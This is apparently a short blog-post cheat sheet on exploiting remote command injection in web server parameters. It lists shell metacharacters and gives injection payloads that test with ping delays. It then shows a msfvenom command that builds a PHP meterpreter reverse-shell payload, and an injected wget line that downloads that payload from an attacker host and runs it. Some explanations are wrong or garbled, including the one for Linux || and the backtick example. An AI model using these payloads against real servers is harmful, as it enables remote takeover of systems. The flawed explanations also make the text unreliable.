remote command injection

check for web server parameters GET, POST HTTP header

;

The semicolon is most common metacharacter used to test an injection flaw. The shell would run all the commands in sequence separated by the semicolon.

&

It separates multiple commands on one command line. It runs the first command then the second command.

&&
It runs the command following  && only if the preceding command is successful
||(windows)

It run the command following || only if the preceding command fails. Runs the first command then runs the second command only if the first command did not complete successfully

|| ( Linux)

Redirects standard outputs of the first command to standard input of the second command

The unquoting metacharacter is used to force the shell to interpret and run the command between the backticks. Following is an example of this command: Variable= “OS version uname -a” && echo $variable

()

It is used to nest commands

Examples:

| ping -i 30 127.0.0.1 |
| ping -n 30 127.0.0.1|
& ping -i 30 127.0.0.1&
&ping -n 30 127.0.0.1&
;ping -i 30 127.0.0.1;
%0a ping -i 30 127.0.0.1 %0a
` ping 127.0.0.1

If above works then use msfpayload to create following

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=666 -e php/base64 -f raw > /root/Desktop/exploit.txt

open exploit.txt file and add php open and close brackets

 <?php echo ... ?>

start http web server and execute following

;wget http://<attacking_ip>/exploit.txt  -O /tmp/exploit.php;php -f /tmp/exploit.php

0 Comments

Leave a Reply

Your email address will not be published.